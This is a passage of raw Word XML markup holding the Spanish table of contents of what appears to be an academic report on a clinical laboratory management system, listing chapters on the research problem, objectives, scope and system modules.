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sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:id w:val="-676200980"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="00ED68D7" w:rsidRDefault="00ED68D7" w:rsidP="00BD6D33">
          <w:pPr>
            <w:pStyle w:val="TtuloTDC"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="0"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:t>Tabla de contenido</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00FC5AAE" w:rsidRDefault="00ED68D7">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-BO"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc454371280" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>INTRODUCCIÓN</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371280 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FC5AAE" w:rsidRDefault="005E1471">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-BO"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc454371281" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Capítulo 1.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Problema de Investigación</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371281 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FC5AAE" w:rsidRDefault="005E1471">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-BO"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc454371282" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Antecedentes</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371282 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FC5AAE" w:rsidRDefault="005E1471">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-BO"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc454371283" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Definición del Problema</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371283 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</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284" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.1.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Situación problemática</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371284 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</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285" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.2.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Situación deseada</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371285 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FC5AAE" w:rsidRDefault="005E1471">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-BO"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc454371286" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Objetivos</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371286 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</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287" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3.1.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Objetivo General</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371287 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</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288" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3.2.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Objetivos Específicos</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371288 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FC5AAE" w:rsidRDefault="005E1471">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-BO"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc454371289" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Alcance</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371289 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</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290" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.1.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Módulo Pacientes</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371290 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</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291" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.2.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Módulo Movimientos</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371291 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</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292" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.3.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Módulo Maestro</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371292 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</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293" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.4.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Módulo Análisis</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371293 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FC5AAE" w:rsidRDefault="005E1471">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8828"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="es-BO"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc454371294" w:history="1">
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Capítulo 2.</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="es-BO"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE" w:rsidRPr="0099014E">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Laboratorios Clínicos</w:t>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc454371294 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC5AAE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
